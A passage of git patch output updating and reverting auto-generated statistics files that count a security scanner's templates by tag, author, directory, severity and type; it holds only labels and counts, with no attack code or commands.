visualtools | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 0f79e9d451..e3518cbcea 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve | 527 | dhiyaneshdk | 227 | cves | 534 | info | 558 | http | 1613 | +| panel | 210 | pikpikcu | 219 | vulnerabilities | 249 | high | 434 | file | 43 | +| xss | 192 | pdteam | 188 | exposed-panels | 212 | medium | 361 | network | 35 | +| wordpress | 182 | dwisiswant0 | 126 | exposures | 170 | critical | 204 | dns | 10 | +| exposure | 178 | geeknik | 120 | technologies | 150 | low | 149 | | | +| rce | 175 | daffainfo | 104 | misconfiguration | 118 | | | | | +| cve2020 | 151 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 150 | princechaddha | 53 | default-logins | 49 | | | | | +| wp-plugin | 121 | gy741 | 48 | file | 43 | | | | | +| tech | 92 | gaurang | 42 | workflows | 34 | | | | | From 79cf199ac6c0711afc1531086828e2cb69a4f1fc Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 31 Jul 2021 01:07:22 +0530 Subject: [PATCH 1314/4083] Revert "Auto Generated Templates Stats [Fri Jul 30 19:24:16 UTC 2021] :robot:" This reverts commit 5ac86db16eaf5c0aa098c526fdbc387513c9f200. --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1268 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 632 insertions(+), 658 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 9d4a1b263a..7f012a1194 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":527},{"name":"panel","count":210},{"name":"xss","count":192},{"name":"wordpress","count":182},{"name":"exposure","count":178},{"name":"rce","count":175},{"name":"cve2020","count":151},{"name":"lfi","count":150},{"name":"wp-plugin","count":121},{"name":"tech","count":92},{"name":"config","count":90},{"name":"cve2019","count":83},{"name":"cve2021","count":83},{"name":"takeover","count":72},{"name":"","count":66},{"name":"cve2018","count":66},{"name":"token","count":64},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"cve2017","count":45},{"name":"iot","count":44},{"name":"file","count":43},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":24},{"name":"listing","count":23},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"cve2015","count":16},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"android","count":13},{"name":"struts","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"cve2012","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"jenkins","count":11},{"name":"springboot","count":11},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"cve2014","count":10},{"name":"devops","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"router","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"coldfusion","count":6},{"name":"backup","count":6},{"name":"dell","count":6},{"name":"jetty","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"files","count":5},{"name":"iis","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"java","count":5},{"name":"fileupload","count":5},{"name":"ruijie","count":5},{"name":"confluence","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"solr","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"django","count":5},{"name":"laravel","count":5},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"solarwinds","count":4},{"name":"traversal","count":4},{"name":"docker","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"magmi","count":4},{"name":"thinkcmf","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"elastic","count":4},{"name":"crlf","count":4},{"name":"vbulletin","count":3},{"name":"itop","count":3},{"name":"fpd","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"microstrategy","count":3},{"name":"windows","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"zabbix","count":3},{"name":"bitrix","count":3},{"name":"resin","count":3},{"name":"printer","count":3},{"name":"hp","count":3},{"name":"cve2010","count":3},{"name":"nacos","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"slack","count":3},{"name":"caucho","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"kafka","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"openssh","count":3},{"name":"lfr","count":3},{"name":"idrac","count":2},{"name":"xxljob","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"service","count":2},{"name":"strapi","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"github","count":2},{"name":"cve2007","count":2},{"name":"yapi","count":2},{"name":"openfire","count":2},{"name":"akamai","count":2},{"name":"paloalto","count":2},{"name":"proxy","count":2},{"name":"spark","count":2},{"name":"kibana","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"keycloak","count":2},{"name":"maian","count":2},{"name":"sonarqube","count":2},{"name":"microsoft","count":2},{"name":"hjtcloud","count":2},{"name":"phpcollab","count":2},{"name":"telerik","count":2},{"name":"jeedom","count":2},{"name":"horde","count":2},{"name":"saltstack","count":2},{"name":"huawei","count":2},{"name":"injection","count":2},{"name":"natshell","count":2},{"name":"showdoc","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"jboss","count":2},{"name":"frp","count":2},{"name":"oauth","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"jellyfin","count":2},{"name":"shellshock","count":2},{"name":"hashicorp","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"pega","count":2},{"name":"intrusive","count":2},{"name":"kevinlab","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"linkerd","count":2},{"name":"plesk","count":2},{"name":"nagios","count":2},{"name":"nextjs","count":2},{"name":"fortios","count":2},{"name":"mida","count":2},{"name":"kentico","count":2},{"name":"chiyu","count":2},{"name":"smb","count":2},{"name":"openam","count":2},{"name":"voipmonitor","count":2},{"name":"prometheus","count":2},{"name":"cve2008","count":2},{"name":"zhiyuan","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"chamilo","count":2},{"name":"seeyon","count":2},{"name":"dos","count":2},{"name":"sonicwall","count":2},{"name":"activemq","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"waf","count":2},{"name":"leak","count":2},{"name":"couchdb","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"jsf","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"mail","count":2},{"name":"bigip","count":2},{"name":"biometrics","count":1},{"name":"opensns","count":1},{"name":"powercreator","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"plugin","count":1},{"name":"wso2","count":1},{"name":"opentsdb","count":1},{"name":"ricoh","count":1},{"name":"ssltls","count":1},{"name":"wing-ftp","count":1},{"name":"kyan","count":1},{"name":"goahead","count":1},{"name":"seacms","count":1},{"name":"netsweeper","count":1},{"name":"jenzabar","count":1},{"name":"jitsi","count":1},{"name":"swagger","count":1},{"name":"interlib","count":1},{"name":"vnc","count":1},{"name":"doh","count":1},{"name":"robomongo","count":1},{"name":"timeclock","count":1},{"name":"sqlite","count":1},{"name":"addpac","count":1},{"name":"appweb","count":1},{"name":"zend","count":1},{"name":"sarg","count":1},{"name":"zeroshell","count":1},{"name":"fuelcms","count":1},{"name":"netdata","count":1},{"name":"tensorflow","count":1},{"name":"tamronos","count":1},{"name":"parentlink","count":1},{"name":"zcms","count":1},{"name":"embedthis","count":1},{"name":"tensorboard","count":1},{"name":"mongo","count":1},{"name":"ganglia","count":1},{"name":"fortigate","count":1},{"name":"thinkadmin","count":1},{"name":"javascript","count":1},{"name":"gridx","count":1},{"name":"mautic","count":1},{"name":"anchorcms","count":1},{"name":"avtech","count":1},{"name":"ilo4","count":1},{"name":"ntopng","count":1},{"name":"qcubed","count":1},{"name":"servicenow","count":1},{"name":"nedi","count":1},{"name":"wazuh","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"clink-office","count":1},{"name":"rdp","count":1},{"name":"smartsense","count":1},{"name":"centos","count":1},{"name":"weiphp","count":1},{"name":"cocoon","count":1},{"name":"mysql","count":1},{"name":"viewlinc","count":1},{"name":"rfi","count":1},{"name":"vscode","count":1},{"name":"openrestry","count":1},{"name":"varnish","count":1},{"name":"cors","count":1},{"name":"fedora","count":1},{"name":"getsimple","count":1},{"name":"salesforce","count":1},{"name":"nomad","count":1},{"name":"centreon","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"kong","count":1},{"name":"htmli","count":1},{"name":"openx","count":1},{"name":"lutron","count":1},{"name":"ssl","count":1},{"name":"mara","count":1},{"name":"nexusdb","count":1},{"name":"proftpd","count":1},{"name":"dotclear","count":1},{"name":"nps","count":1},{"name":"scimono","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"livezilla","count":1},{"name":"webui","count":1},{"name":"enumeration","count":1},{"name":"turbocrm","count":1},{"name":"realteo","count":1},{"name":"plastic","count":1},{"name":"labtech","count":1},{"name":"h3c-imc","count":1},{"name":"74cms","count":1},{"name":"clave","count":1},{"name":"netrc","count":1},{"name":"triconsole","count":1},{"name":"azure","count":1},{"name":"crm","count":1},{"name":"k8","count":1},{"name":"flink","count":1},{"name":"xdcms","count":1},{"name":"sentry","count":1},{"name":"firebase","count":1},{"name":"tongda","count":1},{"name":"redhat","count":1},{"name":"kubeflow","count":1},{"name":"bullwark","count":1},{"name":"cloudflare","count":1},{"name":"skywalking","count":1},{"name":"twitter-server","count":1},{"name":"feifeicms","count":1},{"name":"mailchimp","count":1},{"name":"solman","count":1},{"name":"zzzcms","count":1},{"name":"erp-nc","count":1},{"name":"jeewms","count":1},{"name":"mirai","count":1},{"name":"phpfusion","count":1},{"name":"pagespeed","count":1},{"name":"octoprint","count":1},{"name":"blue-ocean","count":1},{"name":"rujjie","count":1},{"name":"dom","count":1},{"name":"concrete","count":1},{"name":"redwood","count":1},{"name":"setup","count":1},{"name":"totaljs","count":1},{"name":"phpunit","count":1},{"name":"accela","count":1},{"name":"nuuo","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"cgi","count":1},{"name":"tileserver","count":1},{"name":"discourse","count":1},{"name":"darkstat","count":1},{"name":"monitorr","count":1},{"name":"mediumish","count":1},{"name":"oscommerce","count":1},{"name":"panabit","count":1},{"name":"szhe","count":1},{"name":"xff","count":1},{"name":"memcached","count":1},{"name":"status","count":1},{"name":"clockwatch","count":1},{"name":"mdb","count":1},{"name":"bolt","count":1},{"name":"sourcebans","count":1},{"name":"wiki","count":1},{"name":"aspnuke","count":1},{"name":"wondercms","count":1},{"name":"diris","count":1},{"name":"cacti","count":1},{"name":"upload","count":1},{"name":"xunchi","count":1},{"name":"ambari","count":1},{"name":"expn","count":1},{"name":"wamp","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"mpsec","count":1},{"name":"bigbluebutton","count":1},{"name":"zarafa","count":1},{"name":"spidercontrol","count":1},{"name":"sangfor","count":1},{"name":"svnserve","count":1},{"name":"opensmtpd","count":1},{"name":"tapestry","count":1},{"name":"grails","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"panos","count":1},{"name":"linksys","count":1},{"name":"geutebruck","count":1},{"name":"glances","count":1},{"name":"etouch","count":1},{"name":"maccmsv10","count":1},{"name":"codeigniter","count":1},{"name":"b2evolution","count":1},{"name":"gloo","count":1},{"name":"opencast","count":1},{"name":"mariadb","count":1},{"name":"zte","count":1},{"name":"razor","count":1},{"name":"sco","count":1},{"name":"xmlchart","count":1},{"name":"flash","count":1},{"name":"db","count":1},{"name":"aura","count":1},{"name":"plc","count":1},{"name":"fortinet","count":1},{"name":"ioncube","count":1},{"name":"uwsgi","count":1},{"name":"ns","count":1},{"name":"mcafee","count":1},{"name":"finereport","count":1},{"name":"duomicms","count":1},{"name":"st","count":1},{"name":"wavemaker","count":1},{"name":"rubedo","count":1},{"name":"lighttpd","count":1},{"name":"alerta","count":1},{"name":"cse","count":1},{"name":"hiboss","count":1},{"name":"esmtp","count":1},{"name":"hasura","count":1},{"name":"javamelody","count":1},{"name":"manageengine","count":1},{"name":"floc","count":1},{"name":"landrayoa","count":1},{"name":"ecom","count":1},{"name":"resourcespace","count":1},{"name":"aruba","count":1},{"name":"haproxy","count":1},{"name":"scs","count":1},{"name":"trilithic","count":1},{"name":"jenkin","count":1},{"name":"upnp","count":1},{"name":"favicon","count":1},{"name":"alibaba","count":1},{"name":"calendarix","count":1},{"name":"gitlist","count":1},{"name":"spf","count":1},{"name":"openerp","count":1},{"name":"camunda","count":1},{"name":"bash","count":1},{"name":"webftp","count":1},{"name":"qvisdvr","count":1},{"name":"pulsesecure","count":1},{"name":"netis","count":1},{"name":"lanproxy","count":1},{"name":"cobub","count":1},{"name":"eprints","count":1},{"name":"visionhub","count":1},{"name":"mobileiron","count":1},{"name":"ems","count":1},{"name":"fortigates","count":1},{"name":"acontent","count":1},{"name":"spectracom","count":1},{"name":"glpi","count":1},{"name":"yachtcontrol","count":1},{"name":"metinfo","count":1},{"name":"nuxeo","count":1},{"name":"springframework","count":1},{"name":"synnefo","count":1},{"name":"krweb","count":1},{"name":"dotnetnuke","count":1},{"name":"expose","count":1},{"name":"extractor","count":1},{"name":"stem","count":1},{"name":"tpshop","count":1},{"name":"myucms","count":1},{"name":"wildfly","count":1},{"name":"fastapi","count":1},{"name":"svn","count":1},{"name":"liferay","count":1},{"name":"arl","count":1},{"name":"exacqvision","count":1},{"name":"wmt","count":1},{"name":"rmi","count":1},{"name":"monitorix","count":1},{"name":"postmessage","count":1},{"name":"klog","count":1},{"name":"wooyun","count":1},{"name":"viewpoint","count":1},{"name":"majordomo2","count":1},{"name":"mantis","count":1},{"name":"csrf","count":1},{"name":"magicflow","count":1},{"name":"ec2","count":1},{"name":"cerebro","count":1},{"name":"jnoj","count":1},{"name":"pacsone","count":1},{"name":"comodo","count":1},{"name":"hadoop","count":1},{"name":"spip","count":1},{"name":"dlogin","count":1},{"name":"sprintful","count":1},{"name":"backdoor","count":1},{"name":"jmx","count":1},{"name":"socomec","count":1},{"name":"axis","count":1},{"name":"zookeeper","count":1},{"name":"gespage","count":1},{"name":"xml","count":1},{"name":"webadmin","count":1},{"name":"openstack","count":1},{"name":"xiuno","count":1},{"name":"beanshell","count":1},{"name":"phpinfo","count":1},{"name":"vsftpd","count":1},{"name":"javafaces","count":1},{"name":"opm","count":1},{"name":"rsyncd","count":1},{"name":"heroku","count":1},{"name":"wp-theme","count":1},{"name":"cloudinary","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"shopxo","count":1},{"name":"landray","count":1},{"name":"redcap","count":1},{"name":"dvwa","count":1},{"name":"hortonworks","count":1},{"name":"geddy","count":1},{"name":"avalanche","count":1},{"name":"huijietong","count":1},{"name":"moinmoin","count":1},{"name":"achecker","count":1},{"name":"lancom","count":1},{"name":"apos","count":1},{"name":"pippoint","count":1},{"name":"expressjs","count":1},{"name":"wuzhicms","count":1},{"name":"ueditor","count":1},{"name":"pyramid","count":1},{"name":"jfrog","count":1},{"name":"tenda","count":1},{"name":"dompdf","count":1},{"name":"gogs","count":1},{"name":"npm","count":1},{"name":"nordex","count":1},{"name":"clusterengine","count":1},{"name":"acexy","count":1},{"name":"subrion","count":1},{"name":"pgadmin","count":1},{"name":"bitly","count":1},{"name":"gateone","count":1},{"name":"webmin","count":1},{"name":"email","count":1},{"name":"sceditor","count":1},{"name":"rhymix","count":1},{"name":"acme","count":1},{"name":"portainer","count":1},{"name":"keenetic","count":1},{"name":"2014","count":1},{"name":"selea","count":1},{"name":"grav","count":1},{"name":"exchange","count":1},{"name":"spring","count":1},{"name":"rmc","count":1},{"name":"jquery","count":1},{"name":"kerbynet","count":1},{"name":"bookstack","count":1},{"name":"zimbra","count":1},{"name":"circontrorl","count":1},{"name":"episerver","count":1},{"name":"vsphere","count":1},{"name":"codemeter","count":1},{"name":"bruteforce","count":1},{"name":"rabbitmq","count":1},{"name":"cve2005","count":1},{"name":"ruby","count":1},{"name":"nette","count":1},{"name":"wavlink","count":1},{"name":"druid","count":1},{"name":"kafdrop","count":1},{"name":" default-login","count":1},{"name":"timesheet","count":1},{"name":"chinaunicom","count":1},{"name":"enum","count":1},{"name":"plone","count":1},{"name":"froxlor","count":1},{"name":"domxss","count":1},{"name":"zenario","count":1},{"name":"harbor","count":1},{"name":"saltapi","count":1},{"name":"mantisbt","count":1},{"name":"yii","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"drone","count":1},{"name":"payara","count":1},{"name":"bedita","count":1},{"name":"visualtools","count":1},{"name":"emc","count":1},{"name":"akkadian","count":1},{"name":"servicedesk","count":1},{"name":"woocomernce","count":1},{"name":"adminer","count":1},{"name":"node-red-dashboard","count":1},{"name":"sgp","count":1},{"name":"linkedin","count":1},{"name":"blind","count":1},{"name":"blackboard","count":1},{"name":"fastcgi","count":1},{"name":"symfony","count":1},{"name":"iptime","count":1},{"name":"traefik","count":1},{"name":"circontrol","count":1},{"name":"eyou","count":1},{"name":"sage","count":1},{"name":"csod","count":1},{"name":"commscope","count":1},{"name":"optiLink","count":1},{"name":"sitecore","count":1},{"name":"jsp","count":1},{"name":"primetek","count":1},{"name":"webmodule-ee","count":1},{"name":"k8s","count":1},{"name":"tika","count":1},{"name":"apiman","count":1},{"name":"xvr","count":1},{"name":"nc2","count":1},{"name":"wifisky","count":1},{"name":"faraday","count":1},{"name":"empirecms","count":1},{"name":"zm","count":1},{"name":"fortilogger","count":1},{"name":"fortiweb","count":1},{"name":"checkpoint","count":1},{"name":"fiori","count":1},{"name":"postgres","count":1},{"name":"sidekiq","count":1},{"name":"discord","count":1},{"name":"zmanda","count":1},{"name":"lansweeper","count":1},{"name":"lotuscms","count":1}],"authors":[{"name":"dhiyaneshdk","count":227},{"name":"pikpikcu","count":219},{"name":"pdteam","count":188},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":120},{"name":"daffainfo","count":104},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"iamnoooob","count":4},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"meme-lord","count":4},{"name":"rootxharsh","count":4},{"name":"jarijaas","count":3},{"name":"mavericknerd","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"manas_harsh","count":2},{"name":"randomrobbie","count":2},{"name":"hetroublemakr","count":2},{"name":"emenalf","count":2},{"name":"zomsop82","count":2},{"name":"incogbyte","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"kiblyn11","count":2},{"name":"afaq","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xelkomy","count":2},{"name":"nkxxkn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"w4cky_","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"moritz nentwig","count":2},{"name":"0xsapra","count":2},{"name":"bing0o","count":2},{"name":"swissky","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"x1m_martijn","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"alifathi-h1","count":2},{"name":"davidmckennirey","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"0xrudra","count":2},{"name":"0xcrypto","count":2},{"name":"foulenzer","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"bad5ect0r","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"jteles","count":1},{"name":"whynotke","count":1},{"name":"andysvints","count":1},{"name":"shreyapohekar","count":1},{"name":"ooooooo_q","count":1},{"name":"rojanrijal","count":1},{"name":"iampritam","count":1},{"name":"abison_binoy","count":1},{"name":"me9187","count":1},{"name":"andirrahmani1","count":1},{"name":"johnjhacking","count":1},{"name":"luskabol","count":1},{"name":"thevillagehacker","count":1},{"name":"yashanand155","count":1},{"name":"ringo","count":1},{"name":"sicksec","count":1},{"name":"b0yd","count":1},{"name":"kurohost","count":1},{"name":"affix","count":1},{"name":"mohammedsaneem","count":1},{"name":"johnk3r","count":1},{"name":"manuelbua","count":1},{"name":"daviey","count":1},{"name":"0h1in9e","count":1},{"name":"sickwell","count":1},{"name":"j33n1k4","count":1},{"name":"bjhulst","count":1},{"name":"thezakman","count":1},{"name":"absshax","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"toufik airane","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"berkdusunur","count":1},{"name":"mhdsamx","count":1},{"name":"akshansh","count":1},{"name":"sullo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"flag007","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"co0nan","count":1},{"name":"nytr0gen","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"cookiehanhoan","count":1},{"name":"its0x08","count":1},{"name":"knassar702","count":1},{"name":"_darrenmartyn","count":1},{"name":"petruknisme","count":1},{"name":"bernardofsr","count":1},{"name":"bolli95","count":1},{"name":"ohlinge","count":1},{"name":"0xtavian","count":1},{"name":"pdp","count":1},{"name":"huowuzhao","count":1},{"name":"smaranchand","count":1},{"name":"hakluke","count":1},{"name":"aresx","count":1},{"name":"ipanda","count":1},{"name":"th3.d1p4k","count":1},{"name":"regala_","count":1},{"name":"alex","count":1},{"name":"shifacyclewla","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ajaysenr","count":1},{"name":"tim_koopmans","count":1},{"name":"sy3omda","count":1},{"name":"idealphase","count":1},{"name":"d0rkerdevil","count":1},{"name":"dogasantos","count":1},{"name":"willd96","count":1},{"name":"notsoevilweasel","count":1},{"name":"alph4byt3","count":1},{"name":"elmahdi","count":1},{"name":"vsh00t","count":1},{"name":"juicypotato1","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"vzamanillo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"hanlaomo","count":1},{"name":"makyotox","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"yavolo","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"gboddin","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007","count":1},{"name":"arcc","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"un-fmunozs","count":1},{"name":"0xteles","count":1},{"name":"soyelmago","count":1},{"name":"omarkurt","count":1},{"name":"0xrod","count":1},{"name":"naglinagli","count":1},{"name":"r3naissance","count":1},{"name":"b4uh0lz","count":1},{"name":"s1r1u5_","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"wabafet","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"rtcms","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"defr0ggy","count":1},{"name":"c3l3si4n","count":1},{"name":"chron0x","count":1},{"name":"pudsec","count":1},{"name":"_c0wb0y_","count":1},{"name":"ldionmarcil","count":1},{"name":"patralos","count":1},{"name":"exploitation","count":1},{"name":"elder tao","count":1},{"name":"taielab","count":1},{"name":"fmunozs","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"philippdelteil","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"gal nagli","count":1},{"name":"kareemse1im","count":1},{"name":"schniggie","count":1},{"name":"remonsec","count":1},{"name":"undefl0w","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"0ut0fb4nd","count":1},{"name":"shelld3v","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"akash.c","count":1},{"name":"deena","count":1},{"name":"@dwisiswant0","count":1},{"name":"retr0","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo 